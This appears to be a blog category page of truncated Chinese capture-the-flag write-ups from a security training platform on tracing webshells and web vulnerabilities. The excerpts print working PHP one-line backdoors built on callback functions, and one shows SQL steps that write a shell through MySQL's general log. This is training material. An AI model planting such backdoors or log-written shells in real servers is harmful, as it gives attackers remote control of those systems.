
webshell
文章平均质量分 55
多崎巡礼
相遇枕藉乎舟中,不知东方之既白
展开
-
墨者学院 - WebShell代码分析溯源(第1题)
下载源码使用seay源代码审计系统扫一扫(实在不想一个个去看。。。)seay源代码审计系统:https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg 下载出源代码,找到cn-right.php <?phperror_reporting(0);$_GET['POST']($_POST['GET']);?>...原创 2018-07-27 16:25:58 · 1370 阅读 · 5 评论 -
墨者学院 - WebShell代码分析溯源(第4题)
唉让我如此信任的工具在这道题上栽了跟头。。。嗯,以后的结果仅供参考。 下载源代码,在hack文件夹下发现bin.php打开分析代码得知其为php回调函数类一句话木马且获得其密码,通过菜刀连接菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0密码为POSTarray_filter()函数用回调函数过...原创 2018-08-02 17:19:59 · 734 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第5题)
一个个看,,,找到该文件,经典的回调函数形式菜刀连接,ip/www/Exception.php?POST=assert密码为assert得到key关于回调函数可参考此文章https://blog.youkuaiyun.com/qq_24196029/article/details/78118680 <?phperror_reporting(0);call...原创 2018-08-02 17:48:30 · 859 阅读 · 0 评论 -
墨者学院 - 编辑器漏洞分析溯源(第1题)
搜索fckeditor 2.6.4的默认上传路径一般情况下fckeditor编辑器的默认上传地址为:/expansion/fckeditor/editor/filemanager/connectors/test.html/expansion/fckeditor/editor/filemanager/connectors/uploadtest.html查看fckedit...原创 2018-08-08 15:18:29 · 1163 阅读 · 1 评论 -
SQL语句利用日志写shell
outfile被禁止,或者写入文件被拦截在数据库中操作如下:(必须是root权限)1.show variables like ‘%general%'; #查看配置2.set global general_log = on; #开启general log模式3.set global general_log_file = ‘/var/www/html/1.php'; #设置日志目录为s...转载 2018-08-20 14:30:33 · 2431 阅读 · 0 评论 -
墨者学院 - 远程电子数据取证-木马分析
第一题驱动级文件隐藏此驱动级隐藏文件会在服务项增加一个xlkfs的服务驱动文件路径为:c:\WINDOWS\system32\drivers\xlkfs.sys配置文件路径为:c:\WINDOWS\xlkfs.ini转自:http://www.91ri.org/15356.html 独自等待 解题思路:连接上服务器,先搜索SEO找到seo文件夹路径,在C:\Inet...原创 2018-08-28 12:35:16 · 2175 阅读 · 0 评论 -
墨者学院 - IIS写权限漏洞分析溯源
该漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。 iis scan工具链接链接:https://pan.baidu.com/s/1LjeOMxJuNTpez1Se9i7PUw 密码:7m54...原创 2018-08-29 15:42:11 · 1475 阅读 · 1 评论 -
墨者学院 - WebShell文件上传分析溯源(第1题)
此题同墨者学院 - WebShell文件上传漏洞分析溯源(第5题)一模一样啊,,,https://blog.youkuaiyun.com/qq_42357070/article/details/81665014。。。原创 2018-08-29 16:13:10 · 1073 阅读 · 0 评论 -
墨者学院 - WordPress插件漏洞分析溯源
使用wpscan扫面wordpress有漏洞的插件wpscan --url "ip" --enumerate vp 查找插件漏洞http://www.bkjia.com/xtaq/783717.html构造链接http://ip/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&actio...原创 2018-08-30 11:41:10 · 2286 阅读 · 0 评论 -
webshell原理
(源自摘抄整理)https://www.91ri.org/11494.htmlWebshell实现与隐藏探究一、什么是webshellwebshell简介webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管...原创 2018-09-28 13:08:56 · 35947 阅读 · 0 评论 -
墨者学院 - CMS系统漏洞分析溯源(第5题)
phpecms1.3 cookies欺骗漏洞进后台phpecms1.3/admin/cms_check.php<?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); };?> 判断如果没有admin_na...原创 2018-10-29 17:34:25 · 1658 阅读 · 0 评论 -
墨者学院 - CMS系统漏洞分析溯源(第2题)
登陆后台。使用admin.php就可以进入后台用户名密码都是自动填上的,直接登陆就可以。界面->模板风格->详细列表->search->index.html->将一句话木马添加进去后保存。 ...原创 2018-08-06 12:51:38 · 1387 阅读 · 1 评论 -
墨者学院 - WebShell代码分析溯源(第11题)
<?php if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87'){ //若get到的1不为空且1=GET.fPZ87的话执行下面操作 $_=@fopen('t.php', 'a'); ...原创 2018-08-06 10:30:27 · 777 阅读 · 0 评论 -
墨者学院 - WebShell文件上传漏洞分析溯源(第1题)
上传图片成功上传php失败,即存在过滤尝试更改php版本上传成功得到key原创 2018-07-26 19:18:13 · 1594 阅读 · 0 评论 -
墨者学院 - PHP代码分析溯源(第1题)
1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。3、$__=("`"^"?").(":"^"}").("%.原创 2018-07-30 10:52:31 · 909 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第6题)
审查代码,在图片文件夹中有php(有毒)使用了回调函数array_map(将用函数去执行每个参数,返回结果)、$_REQUEST、$_POST,通过分析,类似于第五题,用e来接受assert的base64加密的值作为函数,用POST作为密码使用菜刀连接地址为 ip/www/Assets/upload/pic3.jpg.php?e=YXNzZXJ0密码是POST,key文件在/var...原创 2018-08-03 22:34:29 · 489 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第3题)
$g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码gethtml路径下拿到key <?php...原创 2018-07-31 15:45:47 · 840 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第2题)
<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?>assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数)因为$array[], POST[]都是数组,所以$array[]=$POST,就是...原创 2018-07-31 15:52:27 · 785 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第7题)
代码审查在random_int.php 前排 发现以下回调后门<?phperror_reporting(0);$e = $_REQUEST['e'];$arr = array('test', $_REQUEST['POST']);uasort($arr, base64_decode($e));诸如此类还有<?php $e = $_REQUEST['...原创 2018-08-05 14:48:07 · 731 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第8题)
审查代码1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码2、没有新的发现,就去目录查找,根据最后的修改时间排查。C:\Users\BayernChenTutu\Desktop\www_bak\fields\class-wp-rest-comment-meta-style.php <?php error_reporting(0);...原创 2018-08-05 15:07:07 · 750 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第9题)
审查代码1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码2、没有新的发现,就去目录查找,根据最后的修改时间排查。 <?php error_reporting(0); $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['joker']);...原创 2018-08-05 15:18:22 · 863 阅读 · 0 评论 -
墨者学院 - WebShell代码分析溯源(第10题)
审查代码1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码2、没有新的发现,就去目录查找,根据最后的修改时间排查。 <?php error_reporting(0); $e = $_REQUEST['e']; declare(ticks=1); register_tick_function ($e, $_REQUEST...原创 2018-08-05 15:28:35 · 558 阅读 · 0 评论 -
墨者学院 - WebShell文件上传分析溯源(第2题)
御剑扫描网址可以得到 ip/admin/upload1.php,ip/admin/upload2.php尝试 ip/admin/upload.php,发现直接跳转upload1.php,没有访问权限继续跳转upload2.phpburpsuite抓包,截取upload.php,查看源码得到forward一下将uploadmd5更改为 upload_file.php发送给re...原创 2018-08-01 12:48:57 · 2380 阅读 · 0 评论 -
墨者学院 - 主机溢出提权漏洞分析
背景介绍公司内部服务器,上面有一简单的上传入口,刚入职的小伙伴在C盘根目录下有一个TXT文本文件,说权限设置的很低,除Administrator外,其他用户无法读取到内容,直接向安全工程师&quot;墨者&quot;发出挑战,让其测试。实训目标1、掌握文件上传的技巧;2、掌握IIS中间件存在的畸形解析漏洞;3、了解Windows系统CMD命令执行;4、了解查看操作系统安全补丁情况;5、了解Windows...原创 2018-11-05 13:30:00 · 984 阅读 · 0 评论